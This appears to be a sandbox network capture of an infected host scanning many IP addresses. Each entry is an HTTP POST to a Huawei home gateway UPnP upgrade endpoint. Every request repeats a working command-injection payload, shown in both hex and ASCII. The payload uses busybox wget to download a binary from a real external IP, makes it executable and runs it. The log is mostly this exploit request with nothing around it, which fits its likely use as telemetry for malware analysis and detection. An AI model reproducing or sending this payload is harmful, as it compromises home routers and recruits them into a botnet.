                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            222192.168.2.1541840197.103.1.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178256035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            223192.168.2.1545950197.12.166.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178258896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            224192.168.2.1551604197.225.132.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178297043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            225192.168.2.1535038197.57.92.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178327084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            226192.168.2.1539972197.201.228.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178364038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            227192.168.2.1556194197.136.224.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178364038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            228192.168.2.1546168197.1.51.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178368092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            229192.168.2.1535380197.191.177.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178395987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            230192.168.2.1549424197.79.92.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178425074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            231192.168.2.1550656197.7.185.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178494930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 